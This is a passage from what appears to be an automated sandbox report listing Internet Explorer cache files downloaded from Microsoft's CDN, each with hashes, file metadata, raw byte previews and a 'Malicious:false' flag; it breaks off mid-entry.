                                                                                                                                                                                                              Preview: ......JFIF.....`.`.....C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO........g.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...(...(...(...(...(...(...(...(...(...(...(....n.m....H...h.#..l....z......o5..H....O.@..E..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..V.|3.x...c."S...O...7..37.uQ.-..Xi.....5..}...e...+...*...>.......=-U..}......d....-[L..N....5....o...M..m..m..%....^Qw.\^H^y]..ri6R..T......xn....kn.P.5..ha.L|.H....$n..5.._.cq..$.A.Ts2...Z...]
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\RE4qAnG[1].png
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:PNG image data, 75 x 75, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):5413
                                                                                                                                                                                                              Entropy (8bit):7.951039229881226
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:t6KjOzvhODvGnw99kawCBFPs5tyLWqB/HfBm2+atws/gzi+4ZXK22m7j/19aZwHO:sqOzUDuw9+nCBFU5sL5B/Hfo2+48i+kA
                                                                                                                                                                                                              MD5:B41DB2ADF616D2D1401F6D9758A2F5E2
                                                                                                                                                                                                              SHA1:E19803DEA1ED29FEAD76E477121F6113E213748A
                                                                                                                                                                                                              SHA-256:463F9125D2CF6BA709593CF478F6305E5622AF686C9C3BF54501339F150783CD
                                                                                                                                                                                                              SHA-512:A0285FEBB5EBEB1CB51A265356E953E7FA346BC171786FA97B83573D9FBCE9131838B23F4CFD30E079632326552FEB8CCA9F6C5CC60D9E6BA301B526F9F29B79
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4qAnG?ver=7bce&q=100&h=75&w=75&b=%23FFFFFFFF&aim=true
                                                                                                                                                                                                              Preview: .PNG........IHDR...K...K.....8Nz.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.[[.].y^..~.5..CB...$......... E.<..Vj%^..}.E}..Vj+U..T..4...J}H..B.PZ..!.`c ...mf<c.9sN.........M9QD.7g....Z.^k...G....#|...z..Q..qa.0........~.oz...Z.4.Tm......k]..5~......0.y..#O.......$Y.....m.{.R......d...=..l...N.U.~......g.{.O.x.......v..D...&'.T.KP.6....~..U..D1y,CA........HV.5.a[N....Z....e.%..^.h.?....L`...qP.$ke~..P.p^r%.<.c............7,......6...1.#IV{0.w..*...3qYvG....R.A.o...O.%.(.[.....<.ff..}5q..T...z.&.5.gd....fr.....!....E.2..P..4Q...h..S.s..&.j.f>.dY..Y.k..z..09e..`.Ph..I....[C.n..H....H.h.v.....G..b.%(....y|.H...u..L.b...[[...7......B....+..1.zN*.Lr.a9,e#_..C.&4.X.....Zl....I. ..H(..W.3@....$...&Y.UD......|Q.....j..a.%...../9......0.P..E.(.....`.[.XWp.E...^E..(...v=.IF2.d...T3..KR~......N.".._.B.M.~..NJ.7H.[...h.v.T.^..X{Cklr*..2E..X..&..>.[..v....N;....3B... ..^2.K/..!.j..=>..........o~.....W...p....w.dG..5".f1~..}gG.4.
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\RE4qAnQ[1].png
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:PNG image data, 75 x 75, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):6616
                                                                                                                                                                                                              Entropy (8bit):7.961404625118966
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:aYy3IY9DArXSTUr26m97IduPIuo7NV03bqqhVgdKftjuYMGoqKZBA2W:YYY9Dq26IkuPcOGMftBPfKZBHW
                                                                                                                                                                                                              MD5:69243F2B5BD6F58521F0EAD1E79D9F34
                                                                                                                                                                                                              SHA1:E811662E96A5987B66AC82900A25D13F754530A7
                                                                                                                                                                                                              SHA-256:6E1646FD8249CF51C7A431F5CEEB2FDBD5E431463D8D99570C3843D336F265A3
                                                                                                                                                                                                              SHA-512:8112266FE2E50E0278E71915BD0019333A4A3B2DFD4DADFF390EBAD280E65526C2B8AA5AD4C3DF97B3243CEFAB67F929B9242044B1AA277A47131B9A925147C9
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4qAnQ?ver=674e&q=100&h=75&w=75&b=%23FFFFFFFF&aim=true
                                                                                                                                                                                                              Preview: .PNG........IHDR...K...K.....8Nz.....sRGB.........gAMA......a.....pHYs..........o.d...mIDATx^.\..egU^.<...L;......B.R).. .%..B1.D$..+A.X).L..b.F.H .h..(..$4...P:...%}L;....{.....Z..s...t..z.k........93.(<......E.......*....N[GZ.../....,.kKR.....Xj.. >R.....7.L.}...R...j.kt>...h7..!7.....O_^kun.z.Q.er..g&/.<.:...QAJUP.'>,u....)g.."dH..Fj.[........$....[....k..c.J&cE....J./...0ma&..T,/T.F.........l4`...v.q.f.@h.n...XE.;..<T...........r...zv)m.`J..q.T..eU#...l,>s..Q.Wk..S.NK.....Dyv`.(L..uB....YX.K....@=}.O<c.....;V$.K_g*..Qd.,....b.k.8....L.R.|.t.E.....Q\/..t0.H.ES.t......\...oG.0..3........I.6.$....&.<..|}$JA...N.:.iC.UV....@.*AQ...<I.....X..V....V...K.le......".'C=egK].Pc.g..G.rU...:...NO...L.....a..).&..P..sJ.S.^........].=.].`.n..M}..C..y.~B..\...t)w....l.yM....n.D.p.+Q.. ....y.H72.O5.....kR^....T...F.n;v.Q{....Y.@... ;X_]../<y...C..D.-..~..O..n....2K`O2.........,......".O-.C.]...?..r(..~.Q.y...].....eG.u...*..FV......*.......jO..6..0..@
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\RE4qv5D[1].png
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:PNG image data, 75 x 75, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):4562
                                                                                                                                                                                                              Entropy (8bit):7.948632367069261
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:Dddbl1LGzDX/fIfWSYbul3cz11y9GEuYN9eod:BdLKXnIOfql3cz11yRh
                                                                                                                                                                                                              MD5:136B32B7071B807ADB2D6584E588FD43
                                                                                                                                                                                                              SHA1:CBDB0ED90EAB044D20CE7E7A28FAF65847ADA0D6
                                                                                                                                                                                                              SHA-256:6CE8A385E408C1E20CB10AE0CBAA1AE25D386400FF396DF5C02E14C02FDB0292
                                                                                                                                                                                                              SHA-512:95D943192120D76018D4045D0E730BB81C09C16397902D3AB57207A89B5E23B0E2AB921324867387E6D42676522B26FF4623441927FE2713727CBC7F70148054
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4qv5D?ver=6b44&q=100&h=75&w=75&b=%23FFFFFFFF&aim=true
                                                                                                                                                                                                              Preview: .PNG........IHDR...K...K.....8Nz.....sRGB.........gAMA......a.....pHYs..........o.d...gIDATx^.\...e.>3wyk..bY*..P@e.jA...JqMp!!. .4!.....F..T.q.-E$.........Z#*..Tj.Z..}.......?....{ySP...3g....?g...g.mi/.b/......EbO.|..8.(,...<....._.j&.Q+.M.....6..L....8i..yC4.p..t.."%....R5?C./.$...../...n@k..}c..E.s>...|C...ph2.cshd.<J:...=.....'..r./...;.P..9 .....-....=..B.....K.....2K..}.H.l?....^..?....+x7I.....Q.h....G...f*@..zn.P\X.()......~...CR.X.>..I9...B..;N.q....i...........a..rK.+.X..C..i.3.s:.D)...!:..M\.`..&..ce}.^.../V'd.......".Y.v..<.x.fJ+.#=.>7.z.f.A...51,Z.......s.(.X-N..JZ-...6!..S....z..........3..&...&..........V.u.~....d...z..HF`.%.,n1s..m.f~6,...*m....=u.#..p._...V.<.}...8...._.U"^.b.I........3..XS.|Q..ycT.;".?.....c.4<....4J.....7K....^.....&........ .X.....)i./T.j.ZS...........J"v~@....9...G.3..J.3.O{=o...<.E..Zu>.n....)...m2..7.......F.~UfD..GUJju...8......-\....E...G ...f......CU.|......l.df6..n..|.K..Hg.....7(...9.. .<..T.....1M2M
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\RE4qxNL[1].png
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:PNG image data, 75 x 75, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):6150
                                                                                                                                                                                                              Entropy (8bit):7.959505084420325
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:HTn8StGLgsE1dzmBxtTAC6RS8SgC6YNXC:HTnUUr0pM5RSJg+NXC
                                                                                                                                                                                                              MD5:563D417D4AF0136C78AF0AE333675C04
                                                                                                                                                                                                              SHA1:FBAB9FB971C18ADF30095E0C77DEC2D36A15FD42
                                                                                                                                                                                                              SHA-256:41A9B7C42776FB57A196C89AD31470DB7604B08E2CA9CE6FC549E5F0151DEB84
                                                                                                                                                                                                              SHA-512:06BC69991FA80540210B3A75C44C1218B5F4894CFFA36F1F7EF70E6CC6030C26A9F943C44F1DD752B79A59DE5D2A2FEFBA44EDE6B6E5C58137525A18875814B5
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4qxNL?ver=dbaa&q=100&h=75&w=75&b=%23FFFFFFFF&aim=true
                                                                                                                                                                                                              Preview: .PNG........IHDR...K...K.....8Nz.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.[....y.y...J.:X$@..0.R.p.....`.8...b".....SvA.....).&v..........2.. $..).I.,t....Z..........=.XZ9U|.u......t...u...|.O......lH.+...&X....g75..,..5.P.9.c.[..u.2uom..7.>u.....w@*....`M...I....{. {u...rI{...a&[......-.....<g._.pxqT.u.......X*.&. .$...A..8vQ....}{[....7.)... .r.q.}.N.d..@..E...\F...R...at..f.f.pT.u....\..z...."...$.3..L...;n....6vX.Y9......w.....r.A.j....T:..q\.F..x.._........w..f....=...w..#O...4....?..y..o....<C".......:v......I......s.%f$h..qWg.].?x.?.|H..e.........F.(..k.W(.m..x.....>...!.2h..g|..iqi`4.d.2pK....*_.J.. h.}..S.^...q....m....0.....-.z]...J.^.....o..q.W..j.2(.=X..e..J.......w>.I..A.D.I-y.....1....._t[..?.]P... |..<.a[.......n.tQ....VP...d.d8`v..P..D2o...z{..QbD..i0I...........9..SB....+L...A.y.i.L2a..9X..(['..p.>.R......$H......d.Ujl..Q.n...K4..<.8.../..M.....s.fQ......O.8p.h..G...[.M.%.!.d..)Q..].\.8L........Rc.1....2../f
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\RE4r4UE[1].jpg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 37x37, segment length 16, progressive, precision 8, 1920x500, frames 3
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):53769
                                                                                                                                                                                                              Entropy (8bit):7.9746345494835476
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:JH0ZI29pUI0AAcxJzkVtS3cKSEQ0puloDlCgpa8ANVm6hnahe/XJwBmKP:JqLKIzkKWUu2CIad+69a4/5wPP
                                                                                                                                                                                                              MD5:B446CB4477A775C27ED8C81D94307476
                                                                                                                                                                                                              SHA1:8CD5A7B17A1085F2ADD2C510BDE23B9203F1383A
                                                                                                                                                                                                              SHA-256:36CC2A4C05BD102B951BF8F91C42F9E041E7F34B91F3A88E447DA19488C90CDE
                                                                                                                                                                                                              SHA-512:14D4D533D7025026BA0536B4528107D3A83CFDB15D4328475A3293CCC1F4898938B20CEC908365D0228B8EC79C01F1F985DB1EEA0936DF4067AE213B7374D93B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4r4UE?ver=4c65&q=90&m=6&h=500&w=1920&b=%23FFFFFFFF&l=f&o=t&x=1440&y=250&aim=true
                                                                                                                                                                                                              Preview: ......JFIF.....%.%.............................................................&""&0-0>>T.......................................................&""&0-0>>T..........."...................................................d.-%*......-.4...VV..,..I.bH.:.......^S...RR.P[.,.. hR.jz..r..rro.{...s8.....~...._..y;=..EJ..V...5!..-...+B.@....e.bIa.......<S<.j......YU,...Z..}o....\.....I..qc...........\.....l..T..J...........%"fL....q.//?&.0..p...ZA`.iMf5.4J.f....z.'7'&.9w.....x.....?....[....[B...T..m...f.t....,..c3&b..<srr.ng..g.........-.Yf....@zw..{./&...3...\..R........&......V..........B..KA.%YA..fI..O.....{.q.c9w<.c...@Z...4....zw.o...{......S38..8y............z.[...5@...........e.K@L."d:.K...V$.q..O%...,.Q@.,..4.-........srkz.....1....^^.<qg#....v.....@[.h%.h..f.[))*J.&s$d....rrr.l.3.e.{^[.x~.%.4*5s...R.....W......''&.u..c..8.y......fZ.]Z.Z.5..m.il....P%..&r.`f....].re3.e..w.... ...@...4......G......./&..n.3..<q..}....w.Kh.m...hQ....n...@Z.i..L.3.N...wL
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\RE4rriw[1].png
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:PNG image data, 40 x 40, 8-bit colormap, non-interlaced
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):524
                                                                                                                                                                                                              Entropy (8bit):6.30221495762385
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:6v/7byhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhN9vMopwVvvW1Em:jIyv
                                                                                                                                                                                                              MD5:E7C4D5E59B10B90540B17EA760440AE7
                                                                                                                                                                                                              SHA1:7320ED8F4E42B4E8C8FB01F136E6276323CBC281
                                                                                                                                                                                                              SHA-256:C4916E53DC20F0FC3EBC113524CD41C2684F804AA63AA78FADBE1E57C5A2E53A
                                                                                                                                                                                                              SHA-512:2C2D0F058F41FC3ABBC765FE39EDDBAFF73D57AABE91702DBB1E3C9AE6028A23274AB235A7134013DFC5C8BEF3E2C31CD7C5F7DD154A4E053657A14ADBB2327C
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4rriw?ver=b2d5&q=90&m=6&h=40&w=40&b=%23FFFFFFFF&l=f&o=t&aim=true
                                                                                                                                                                                                              Preview: .PNG........IHDR...(...(...... H_....PLTE................................................................................................................................................/1.t.../tRNS.r......0a`:h.......@..P...<.;..>..+ .!..b(..m.$.....orNT..w.....IDAT8......0......`..E.........x...e.[1'w.L....*!K..w.j.e.U.\XGC...5.).....E.......,\8........g2.........W.../....0.]-.......X>=3.d.H..o...v..".1Q|_.h...........b.Z........~9.3..........;L..fv.>..'..+T...w.....~...T.c..../.k.....O.&..j....IEND.B`.
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\RE4tZqs[1].htm
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):4697
                                                                                                                                                                                                              Entropy (8bit):5.2050625467985885
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:AxwrjOGEre+Urre+U/Xre+U3xre+UB4rxpLLUMyU1dUzaULCRpg49Pm+MPfpecKS:AOO++UW+UC+U4+U2rxRLPyCduaUCR64a
                                                                                                                                                                                                              MD5:22D5D8B53A1E0BB5EFB9ED9541CB242E
                                                                                                                                                                                                              SHA1:CD2C70D66108368074C91A406F8B13154C9D39DC
                                                                                                                                                                                                              SHA-256:55C794150CA6D29C83DC45C94CBA27B34BAED2E578A502A8625B5D37C4A5C73C
                                                                                                                                                                                                              SHA-512:909BD1CB667E0A6D430855599F56EE5664581F9BC65C3997589BA93660E0D4C8F29437F6EC2F53EE905773E672039213D1514D6DE2273ABEC547C62DB6FB8024
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://prod-video-cms-rt-microsoft-com.akamaized.net/vhs/api/videos/RE4tZqs
                                                                                                                                                                                                              Preview: {"captions":{},"transcripts":{"en-us":{"url":"https://prod-video-cms-rt-microsoft-com.akamaized.net/cms/api/am/videofiledata/RE4tZqs-tscriptenus?ver=7fa4","link":{"href":"/vhs/api/videos//transcripts/en-us","method":"GET","rel":"self"}}},"snippet":{"activeStartDate":"2021-03-24T02:30:28","culture":"en-us","supplier":{"name":"","source":{"name":""}},"thumbnails":{"extrasmall":{"height":0,"width":0,"assetId":"RE4tWN0","url":"http://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tWN0?ver=466b","link":{"href":"/vhs/api/videos//thumbnails/extrasmall","method":"GET","rel":"self"}},"small":{"height":0,"width":0,"assetId":"RE4tWN0","url":"http://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tWN0?ver=466b","link":{"href":"/vhs/api/videos//thumbnails/small","method":"GET","rel":"self"}},"medium":{"height":0,"width":0,"assetId":"RE4tWN0","url":"http://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tWN0?ver=466b","link":{"
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\RE4wocw[1].jpg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1259x472, frames 3
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):22560
                                                                                                                                                                                                              Entropy (8bit):5.484467786476516
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:pogWokZGZOUAvarHhAo0janJBINxIAAzYKGNw+w8WcZB:O48GIvIHhAoMaJeNxnAzYHu58JZB
                                                                                                                                                                                                              MD5:6D84E5EBA05449D7913E964664EA0C6F
                                                                                                                                                                                                              SHA1:10608278D43D50B42B216BA64F326D7C91C9FF98
                                                                                                                                                                                                              SHA-256:F528259F9A7A3567CE74F6479322B8CD595256464BAB2BD3D298188D0E0BA55D
                                                                                                                                                                                                              SHA-512:B815D604458B98BC8E6FC6F543FEE1A9516E1D588940681AF476C0A90C31E923F8E624BC811188A0AC0A8344249F43E3AF06982966FEF62E98242C9A336B968A
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4wocw?ver=b219&q=0&m=8&h=472&w=1259&b=%23FFFFFFFF&l=f&x=0&y=198&s=2120&d=795&aim=true
                                                                                                                                                                                                              Preview: ......JFIF.....`.`......................................... $.' ",#..(7),01444.'9=82<.342...........2!.!22222222222222222222222222222222222222222222222222....................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..j.(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(......(....
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\RE4wz18[1].png
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:PNG image data, 400 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):17200
                                                                                                                                                                                                              Entropy (8bit):7.965465371912541
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:VUBbQJIYkbEzoAOhCF8BVAiBvBaiFgptaSk:qB0hkQi4iV7F+taSk
                                                                                                                                                                                                              MD5:EBD64F285AAC1DC376B47DA344532C22
                                                                                                                                                                                                              SHA1:A2DC4B6377EBC58E89F6B6B2E62F15BCA0AD38D2
                                                                                                                                                                                                              SHA-256:59317C3C9642C3B054E2E73CAE1B2EC294A918D6ED4A21D7F6699E741B5F0EDE
                                                                                                                                                                                                              SHA-512:5BA7E3DC608C6A462F25BA5D7749FFC849530033E57C4CFAEF57E2850829FAC2348AB3F62AD4DDF23692D2083EAA51128EE5671F22B2C22989FE0989D632D0D5
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4wz18?ver=f456
                                                                                                                                                                                                              Preview: .PNG........IHDR.......x............tEXtSoftware.Adobe ImageReadyq.e<....iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c002 79.164352, 2020/01/30-15:50:38 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:E48B20F68E4E11EA9CD5D03D4DDD6A3C" xmpMM:InstanceID="xmp.iid:E48B20F58E4E11EA9CD5D03D4DDD6A3C" xmp:CreatorTool="Adobe Photoshop 2020 Macintosh"> <xmpMM:DerivedFrom stRef:instanceID="3901C72DF9E79AB003A6CB7C280EC5B7" stRef:documentID="3901C72DF9E79AB003A6CB7C280EC5B7"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>..hV..?.IDATx...tdgy&..v.T.ZR......c...1.....!.6.8.LBH&.t.9s........0......!q.qc.....l......}..j.%......~...U..6..g..}.GU.[U...{.
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\RE4wz19[1].jpg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:[TIFF image data, little-endian, direntries=0], progressive, precision 8, 400x120, frames 3
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):11479
                                                                                                                                                                                                              Entropy (8bit):7.896486755466001
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:hn7zOoW7CvvqX3+jMv4yqsLi+3RGgpKzus9lsg27zd9Pwoug/pUUiL0w:hnnO/+XqHOMAyF3RGoeTlYvd9WgRAL0w
                                                                                                                                                                                                              MD5:0CAA88333B566606C4400EA027185CFE
                                                                                                                                                                                                              SHA1:798BF4464E80C63891A2A621FFA30F683143D8AF
                                                                                                                                                                                                              SHA-256:C469B2AF09E2EDA34E041117D426086F07F98919FAA88A36EE1FD70FCCA284CE
                                                                                                                                                                                                              SHA-512:620277E9CED2E8B99DC8C3EF81FD8AF9899C1290EC4A2FC115A03B5B120562454C97FD1604878019179DC5B61022BEF7F04025C98CFF83D4DC4521705644BBAA
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4wz19?ver=1ae2
                                                                                                                                                                                                              Preview: ......Exif..II*.................Ducky.......K......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c002 79.164352, 2020/01/30-15:50:38 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:858291FD8E4911EA9CD5D03D4DDD6A3C" xmpMM:InstanceID="xmp.iid:858291FC8E4911EA9CD5D03D4DDD6A3C" xmp:CreatorTool="Adobe Photoshop 21.0 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:E9A104AC4AC911EA836DA2A4DC19033B" stRef:documentID="xmp.did:071249CE4ACA11EA836DA2A4DC19033B"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...&Adobe.d................i...... ...,..................................................................................................
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\RWBqjP[1].jpg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 37x37, segment length 16, progressive, precision 8, 498x408, frames 3
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):20440
                                                                                                                                                                                                              Entropy (8bit):7.923023430053644
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:pBHxWwe4F0ta6UkAP8uktAggfRtnRBFYNSW+exxIC1hPok:tvF0KXP8ukDgZtRBG0kIEPD
                                                                                                                                                                                                              MD5:C31B1C12ABE5AC0C13AA936C7C979799
                                                                                                                                                                                                              SHA1:732F0A321B65A119A19A73A2D57FCCB5B5AC3020
                                                                                                                                                                                                              SHA-256:C4EB7E7BC7DEE8F7F5A5C01DF152A04B2060E40A3FB277C10E509A4CBEBB4C0C
                                                                                                                                                                                                              SHA-512:CDAFCE8D1B820FCD29B9D2971D1366507A657EB1E73F80EC5FDB40139AA8009312CC43D83B42D45424C6CB76D08A63DC4B15E5FFE60440CBB0F49C5D01A12AB2
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RWBqjP?ver=2ebf&w=498&h=408&q=90&m=6&b=%23FFF0F0F0&f=jpg&o=f&p=0&aim=true
                                                                                                                                                                                                              Preview: ......JFIF.....%.%.................................................................&$&22C...........................................................&$&22C...........".................................................V...............................................................................Zj.u....>.............^.s.S.T..m...0.xY ......^...T.x/.X../!.....9.s.A.3.$.@@.DE..k.u...=6.i.[yT..q..._......A..E.b.1.>............O........a.B.....(.1.y....i.z}......U>.....L!.B.B..D.Q.c....h.MS..%.<GB.o*.s.?...F..!.!...QF(.1..v...=*l-....-..}.8....xB.P@..DQ.<.........d...U>..{.... . .....F(.<........d...U>..y.....@...D..c..9...i.zv@.m.S.a.>>......."..sG0..w...9s].e..m.8.........DR..-..v3.>..i.a.*f....o.k.6. ....\...uF......G.......5g........F.....G.|.\7-...V..~.....9...N|......~..[.\..q.)j...K......O......H.q...m....=8.W.m.w.BJvvv...5j0....}...)l}..8......0....&..Sl[..lsk....n.....~....9y........4...VY..V.....V....*V..f..,)xg3}.....e../rV.pY{.-........XT.J.:.....
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\RWCOYq[1].jpg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:[TIFF image data, little-endian, direntries=0], baseline, precision 8, 400x120, frames 3
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):6650
                                                                                                                                                                                                              Entropy (8bit):7.740702641587391
                                                                                                                                                                                                              Encrypted:false
